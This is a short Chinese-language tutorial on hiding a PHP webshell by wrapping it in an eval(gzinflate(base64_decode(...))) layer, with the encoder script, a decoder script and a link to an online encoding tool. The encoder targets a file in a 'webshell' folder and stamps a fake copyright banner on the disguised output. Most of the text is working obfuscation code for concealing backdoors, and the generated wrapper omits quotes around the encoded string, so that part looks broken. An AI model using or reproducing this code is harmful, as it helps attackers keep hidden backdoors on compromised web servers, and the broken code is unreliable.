使用base64+gzinflate压缩编码来加密webshell

压缩加密代码：

<?php 

function encode_file_contents($filename) { 
	$type=strtolower(substr(strrchr($filename,'.'),1)); 
	if('php'==$type && is_file($filename) && is_writable($filename)){// 如果是PHP文件,并且可写,则进行压缩编码 
		$contents = file_get_contents($filename);// 判断文件是否已经被编码处理 
		$pos = strpos($contents,'/*Protected by fly ,http://www.hackers.com*/'); 
		if(false === $pos || $pos>100){ // 去除PHP文件注释和空白，减少文件大小 
			$contents = php_strip_whitespace($filename); 
			//去除PHP头部和尾部标识 
			$headerPos = strpos($contents,'<?php'); 
			$footerPos = strrpos($contents,'?>'); 
			$contents = substr($contents,$headerPos+5,$footerPos-$headerPos); 
			$encode = base64_encode(gzdeflate($contents));// 开始编码 
			$encode = '<?php'." /*Protected by fly ,http://www.hackers.com*/\n eval(gzinflate(base64_decode(".$encode.")));\n /*Reverse engineering is illegal and strictly prohibited- (C)fly Cryptation 2019*/ \n?>"; 
			return file_put_contents($filename,$encode); 
		} 
	} 
	return false; 
} 

//调用函数 
$filename='C:\phpstudy\WWW\webshell\1.php'; 
encode_file_contents($filename); 
?> 

压缩解密代码：

<?php 
$Code = '要解密的编码'; // base64编码 
$File = 'test.php';//解码后保存的文件 
$Temp = base64_decode($Code); 
$temp = gzinflate($Temp); 
$FP = fopen($File,"w"); 
fwrite($FP,$temp); 
fclose($FP); 
echo "success！"; 
?>

在线加密解密网站：http://www.zhuisu.net/tool/phpencode.php